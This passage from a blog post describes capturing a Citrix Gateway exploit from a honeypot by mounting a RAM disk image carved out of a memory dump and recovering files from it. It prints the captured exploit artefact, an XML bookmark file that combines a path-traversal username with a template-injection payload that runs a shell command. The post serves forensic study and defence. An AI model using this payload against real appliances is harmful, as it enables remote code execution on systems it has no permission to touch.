$ sudo mount -o ro,loop,offset=22678312,ufstype=ufs2 -t ufs /var/tmp/NetScaler-VPX.dump /mnt $ ls -la /mnt total 48 drwxr-xr-x 20 root root 512 Mar 8 10:27 . drwxr-xr-x 24 root root 4096 Mar 12 22:58 .. drwxr-xr-x 2 root root 1024 Nov 29 06:29 bin lrwxr-xr-x 1 root root 33 Mar 8 10:27 colorful -> /netscaler/portal/themes/colorful drwxr-xr-x 3 root root 512 Nov 29 06:45 compat lrwxr-xr-x 1 root root 15 Mar 8 10:27 configdb -> /flash/configdb drwxr-xr-x 2 root root 512 Nov 29 06:29 dev drwxr-xr-x 8 root root 1536 Mar 8 10:27 etc drwxr-xr-x 2 root root 512 Nov 29 06:29 flash drwxr-xr-x 2 root root 512 Nov 29 06:29 home drwxr-xr-x 3 root root 2048 Nov 29 06:45 lib drwxr-xr-x 2 root root 512 Nov 29 06:42 libexec drwxr-xr-x 2 root root 512 Nov 29 06:29 mnt drwxr-xr-x 16 root root 5632 Nov 29 06:59 netscaler drwxr-xr-x 260 root root 3584 Mar 8 10:27 nscache lrwxr-xr-x 1 root root 16 Mar 8 10:27 nsconfig -> /flash/nsconfig/ lrwxr-xr-x 1 root root 33 Mar 8 10:27 optional -> /netscaler/portal/themes/optional drwxr-xr-x 2 root root 512 Nov 29 06:29 proc drwxr-xr-x 2 root root 512 Nov 29 06:29 root drwxr-xr-x 2 root root 2048 Nov 29 06:29 sbin drwxrwxr-x 2 root tty 512 Nov 29 06:29 .snap drwxrwxrwt 3 root root 1024 Mar 8 10:30 tmp drwxr-xr-x 10 root root 512 Nov 29 06:45 usr drwxr-xr-x 8 root root 512 Nov 29 06:29 var
… and now for the ‘rabbit’, highlighted in bold:
$ ls -lart /mnt/netscaler/portal/templates/ total 168 -r--r--r-- 1 nobody root 4637 Nov 29 06:45 styles.css -r--r--r-- 1 nobody root 1991 Nov 29 06:45 wrapper.tmpl -r--r--r-- 1 nobody root 863 Nov 29 06:45 tips.html -r--r--r-- 1 nobody root 7012 Nov 29 06:45 themes.html -r--r--r-- 1 nobody root 4404 Nov 29 06:45 rmft.html -r--r--r-- 1 nobody root 4398 Nov 29 06:45 rmbm.html -r--r--r-- 1 nobody root 326 Nov 29 06:45 resources.tmpl -r--r--r-- 1 nobody root 216 Nov 29 06:45 preferences.html -r--r--r-- 1 nobody root 1340 Nov 29 06:45 ping.html -r--r--r-- 1 nobody root 9063 Nov 29 06:45 newbm.html -r--r--r-- 1 nobody root 1496 Nov 29 06:45 navwrapper.tmpl -r--r--r-- 1 nobody root 7015 Nov 29 06:45 navthemes.html -r--r--r-- 1 nobody root 167 Nov 29 06:45 missing.html -r--r--r-- 1 nobody root 1496 Nov 29 06:45 menu.tmpl -r--r--r-- 1 nobody root 82 Nov 29 06:45 loadresources.tmpl -r--r--r-- 1 nobody root 489 Nov 29 06:45 j_services.html -r--r--r-- 1 nobody root 28918 Nov 29 06:45 homepage.html -r--r--r-- 1 nobody root 22646 Nov 29 06:45 homepage2.html -r--r--r-- 1 nobody root 0 Nov 29 06:45 globalFS.tmpl -r--r--r-- 1 nobody root 0 Nov 29 06:45 globalBK.tmpl -r--r--r-- 1 nobody root 4078 Nov 29 06:45 ftlist.html -r--r--r-- 1 nobody root 876 Nov 29 06:45 f_services.html -r--r--r-- 1 nobody root 368 Nov 29 06:45 filetransfer.html -r--r--r-- 1 nobody root 503 Nov 29 06:45 error.html -r--r--r-- 1 nobody root 743 Nov 29 06:45 err2006.html -r--r--r-- 1 nobody root 754 Nov 29 06:45 err2005.html -r--r--r-- 1 nobody root 711 Nov 29 06:45 err2004.html -r--r--r-- 1 nobody root 764 Nov 29 06:45 err2002.html -r--r--r-- 1 nobody root 3111 Nov 29 06:45 chpwdsuccess.html -r--r--r-- 1 nobody root 10325 Nov 29 06:45 changepwd.html -r--r--r-- 1 nobody root 6712 Nov 29 06:45 bookmark.html -r-xr-xr-x 1 nobody root 159 Nov 29 06:45 boilerplate.tmpl drwxr-xr-x 10 nobody root 512 Nov 29 06:45 .. -rw-r--r-- 1 root root 333 Mar 6 11:47 f9a7585e.xml drwxr-xr-x 2 nobody root 1024 Mar 8 10:37 .
Reading the exploit artefact file:
$ cat /mnt/netscaler/portal/templates/f9a7585e.xml
<?xml version="1.0" encoding="UTF-8"?>
<user username="../../../netscaler/portal/templates/f9a7585e">
<bookmarks>
<bookmark UI_inuse="" descr="[% template.new('BLOCK' = 'print `ls -l`') %]" title="f9a7585e" url="http://example.com" />
</bookmarks>
<escbk>
</escbk>
<filesystems></filesystems>
<style></style>
</user>
Mission accomplished — we’ve succesfully managed to capture a Citrix Gateway exploit by extracting it from a RAM disk inside a memory dump of a running Citrix Gateway virtual machine. Plus we learnt a little bit about UFS file systems in the process.
There was a potential issue that I thought of, and that is whether or not the FreeBSD kernel uses a file system cache for RAM disks. That would introduce a delay between a file being written to the RAM disk, and it showing up in the RAM disk image in the memory dump.
I did a few tests which basically consisted of writing a file to the RAM disk and creating the memory dump as soon as I could after writing the file. The file showed up in each of the test dumps, suggesting that writes to the RAM disk aren’t cached (or not for any reasonable amount of time anyway).
It doesn’t make sense to create a file system cache for a RAM disk because it will just use up more RAM and be largely ineffective (the reasoning behind a file system cache is that RAM is quicker to write to than disk). It was more a test to see if there was a generic file system layer (like VFS for instance) that was caching all writes regardless of the underlying disk implementation.
Why?!
Now, one question that sprung to mind when I got to this point, was why go to all that bother? Why not just scp (secure copy — copy over SSH) the files off?!
Admittedly it was partly because of the challenge — whether or not I could actually pull it off, plus it enabled me to dabble in a bit of memory forensics, which is something that I’m interested in but haven’t yet done much of.
Another reason is because this method gives us a forensic image of the RAM disk. That means that it doesn’t just preserve the file(s) of interest, but rather it preserves the whole file system — it preserves all the time stamps (modified time, last accessed time, inode change time) and those of the directories too; it preserves the inodes (which can provide some forensic insight); and it preserves the slack space making it potentially possible to recover deleted files.
In this situation we kind of knew the attack and what it was going to do, which meant that we knew what files to look for and to copy off. However, what if we were setting this honeypot up to capture unknown attacks, where we wouldn’t know what files were going to be created/modified/deleted? That is where a forensic image of the RAM disk would be awfully useful.
With a forensic image of the RAM disk it is possible to compare the RAM disk image from the memory dump, with that from the original kernel image, to see which files were created/modified/deleted, but this blog post is long enough as it is.